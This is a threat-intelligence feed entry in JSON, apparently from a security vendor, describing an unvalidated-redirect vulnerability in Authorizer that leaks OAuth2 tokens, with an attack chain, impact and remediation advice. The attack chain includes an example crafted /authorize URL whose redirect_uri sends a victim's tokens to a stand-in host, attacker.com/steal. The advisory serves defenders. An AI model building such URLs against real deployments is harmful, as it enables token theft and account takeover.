{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/products/authorizer--0.0.0-20260409051328-bd3f5baf6d3d/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["authorizer (\u003c 0.0.0-20260409051328-bd3f5baf6d3d)"],"_cs_severities":["critical"],"_cs_tags":["oauth","vulnerability","redirect","token-theft","web","ghsa"],"_cs_type":"advisory","_cs_vendors":["Authorizer"],"content_html":"\u003cp\u003eA critical unvalidated redirect vulnerability (CVE-2026-54072) in the Authorizer platform allows attackers to steal sensitive OAuth2 tokens. This flaw affects Authorizer versions prior to \u003ccode\u003e0.0.0-20260409051328-bd3f5baf6d3d\u003c/code\u003e. An unauthenticated attacker can exploit this by first querying the publicly accessible \u003ccode\u003e/graphql\u003c/code\u003e endpoint to retrieve a valid \u003ccode\u003eclient_id\u003c/code\u003e. They then craft a malicious URL targeting the \u003ccode\u003e/authorize\u003c/code\u003e endpoint, embedding an arbitrary, attacker-controlled \u003ccode\u003eredirect_uri\u003c/code\u003e. If a logged-in victim clicks this link, the Authorizer application performs a 302 redirect to the attacker's specified URL, appending the victim's \u003ccode\u003eaccess_token\u003c/code\u003e, \u003ccode\u003eid_token\u003c/code\u003e, and \u003ccode\u003erefresh_token\u003c/code\u003e as query parameters. This enables the attacker to intercept these tokens and impersonate the victim for the tokens' entire lifetime, bypassing authentication mechanisms. A partial fix was applied in v2.0.1 for other handlers, but the \u003ccode\u003e/authorize\u003c/code\u003e endpoint was overlooked.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker queries the public \u003ccode\u003e/graphql\u003c/code\u003e endpoint (e.g., \u003ccode\u003ehttp://TARGET/graphql\u003c/code\u003e) to obtain the \u003ccode\u003eclient_id\u003c/code\u003e parameter, which is required for authorization requests.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious URL, including the obtained \u003ccode\u003eclient_id\u003c/code\u003e and a controlled \u003ccode\u003eredirect_uri\u003c/code\u003e (e.g., \u003ccode\u003ehttps://attacker.com/steal\u003c/code\u003e), pointing to the vulnerable Authorizer \u003ccode\u003e/authorize\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe malicious URL (e.g., \u003ccode\u003ehttp://TARGET/authorize?response_type=token\u0026amp;client_id=...\u0026amp;redirect_uri=https://attacker.com/steal\u003c/code\u003e) is delivered to a logged-in victim, typically via social engineering.\u003c/li\u003e\n\u003cli\u003eWhen the victim clicks the malicious link, their browser sends an HTTP GET request to the Authorizer \u003ccode\u003e/authorize\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe Authorizer server, lacking proper validation for the \u003ccode\u003eredirect_uri\u003c/code\u003e parameter against \u003ccode\u003eAllowedOrigins\u003c/code\u003e, processes the request.\u003c/li\u003e\n\u003cli\u003eThe server issues a 302 HTTP redirect response, appending the victim's \u003ccode\u003eaccess_token\u003c/code\u003e, \u003ccode\u003eid_token\u003c/code\u003e, and \u003ccode\u003erefresh_token\u003c/code\u003e as query parameters to the attacker-controlled \u003ccode\u003eredirect_uri\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe victim's browser automatically follows the redirect, sending the sensitive tokens to the attacker's server.\u003c/li\u003e\n\u003cli\u003eThe attacker receives and logs the tokens, gaining unauthorized access to the victim's account and the ability to impersonate them.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-54072 results in the complete compromise of a victim's OAuth2 tokens, including \u003ccode\u003eaccess_token\u003c/code\u003e, \u003ccode\u003eid_token\u003c/code\u003e, and \u003ccode\u003erefresh_token\u003c/code\u003e. An attacker can then use these stolen tokens to impersonate the victim and access resources or perform actions on their behalf for the full duration of the token's validity, without any further user interaction beyond the initial click. While the specific number of victims or targeted sectors is not disclosed, any organization using affected versions of Authorizer is at risk of account takeover and unauthorized data access.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ePatch CVE-2026-54072 immediately by updating Authorizer to a patched version (newer than \u003ccode\u003e0.0.0-20260409051328-bd3f5baf6d3d\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026quot;Detects CVE-2026-54072 Exploitation - Malicious redirect_uri in Authorizer /authorize Endpoint\u0026quot; to your SIEM to detect attempts at exploiting this vulnerability.\u003c/li\u003e\n\u003cli\u003eBlock \u003ccode\u003eattacker.com\u003c/code\u003e at your network perimeter, including DNS resolvers and web proxies.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-07-10T19:27:19Z","date_published":"2026-07-10T19:27:19Z","id":"https://feed.craftedsignal.io/briefs/2026-07-authorizer-unvalidated-redirect/","summary":"An unvalidated redirect vulnerability, CVE-2026-54072, in the Authorizer `/authorize` endpoint allows an unauthenticated attacker to steal OAuth2 access, ID, and refresh tokens by crafting a malicious URL with an attacker-controlled `redirect_uri` to which the application redirects a logged-in user, exposing their tokens.","title":"Authorizer Unvalidated Redirect Vulnerability Allows OAuth2 Token Theft","url":"https://feed.craftedsignal.io/briefs/2026-07-authorizer-unvalidated-redirect/"}],"language":"en","title":"CraftedSignal Threat Feed - Authorizer (\u003c 0.0.0-20260409051328-Bd3f5baf6d3d)","version":"https://jsonfeed.org/version/1.1"}